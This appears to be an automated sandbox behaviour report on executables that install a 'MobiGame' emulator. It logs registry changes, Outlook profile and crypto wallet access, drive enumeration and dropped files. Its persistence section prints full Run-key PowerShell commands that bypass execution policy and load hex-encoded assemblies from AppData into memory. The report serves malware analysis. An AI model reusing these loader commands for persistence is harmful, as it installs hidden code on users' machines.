Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32\ThreadingModel = "Free" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e23f7a-f6c2-11e7-aeb4-080027376349}\InprocServer32\ = "C:\\Program Files\\MobiGame\\player\\VBoxC.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e220c6-f6c2-11e7-aeb4-080027376349}\InprocServer32\ = "C:\\Program Files\\MobiGame\\player\\VBoxC.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32\ = "\"C:\\Program Files\\MobiGame\\player\\MobiVBoxSVC.exe\"" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\LocalServer32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 223.5.5.5 N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCStartup = "powershell -noninteractive -ExecutionPolicy bypass -c \"$w=\"$env:APPDATA\"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCUpate = "powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c \"Start-Sleep 300\";\"& \"\"\"C:\\Users\\Admin\\AppData\\Roaming\\BBWC\\updater.exe\"\"\" /silentall -nofreqcheck\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCEStartup = "powershell.exe -ExecutionPolicy bypass -c \"$f=\"$env:APPDATA\"+'/Browser Extension/BE.txt';$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^', '0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCEUpdater = "powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c \"Start-Sleep 2100\";\"& \"\"\"C:\\Users\\Admin\\AppData\\Roaming\\Browser Extension\\updater.exe\"\"\" /silentall -nofreqcheck\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LegalHelper2 = "C:\\Users\\Admin\\AppData\\Local\\LegalHelper2\\LegalHelper2.exe" C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\IEUpdater2\IEUpdater2.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-05\455e6b281f45566309822e9215e699b10ea595e0e45e5ef3dcdd371290c23038.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\53205359a4035ca2_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\a5351d2e-a0e3-4530-abc1-536940b0a3f7.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000f C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000001.dbtmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\52ee93f9b2ae5957_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\d08ad8e6-a8d8-4a95-9b65-e9a75a710eca.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFe601188.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\19fedd4e-550f-4799-a3cc-fadb196fd7ea.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\2b66f54f-9712-45ef-8ee7-0475958414cb.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002c C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000042 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b64ca19c2bda5ea_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\README C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72dcc95104717102_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\41a4ebffd069515d_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\948739cf-5a1d-465a-9fa4-539b83d97e8c.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\22c86e29d33fc1a8_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\142bd51bc9662d56_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72dcc95104717102_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\91dfffe060b1bd5e_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\88a86287-3dc7-4858-9913-ec3f90df667c.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6fb5895f-7fc9-4623-b9af-46748646b87f.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5ebae3eea1f01edc_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9412c8b664751f90_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\14ff8116b518ca2d_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe5c8322.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\efe8c4ae-71ec-48f1-bfb6-9d04b7849e74.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\74b88724f60b0383_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\95227679ae2e410c_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFe5a301a.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\0fb8276d-4258-4c75-a8ea-8436e72956c4.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e2daebc9c47b45a8_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9074c45fcc043b54_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\MobiGame\player\AdbWinApi.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\ca.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\sl.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxSVGA3D.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20231123064155.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\it.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Collections.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxManage.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\android\mobi-android-userdata.vhd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\api-ms-win-core-processthreads-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\libEGL_angle.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Text.Encoding.CodePages.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\unregister_services.cmd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxBalloonCtrl.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetFlt.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxREM.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Win32.Primitives.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\dist\static\media\revicons.a77de540a38981833f9e.eot C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Dynamic.Runtime.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetNAT.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\android\mobi-android-system-x86.vhd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\hxeb3pac.newcfg C:\Windows\System32\svchost.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\es.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\hi.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\NetCoreEx.BinaryExtensions.dll C:\Windows\system32\msiexec.exe N/A
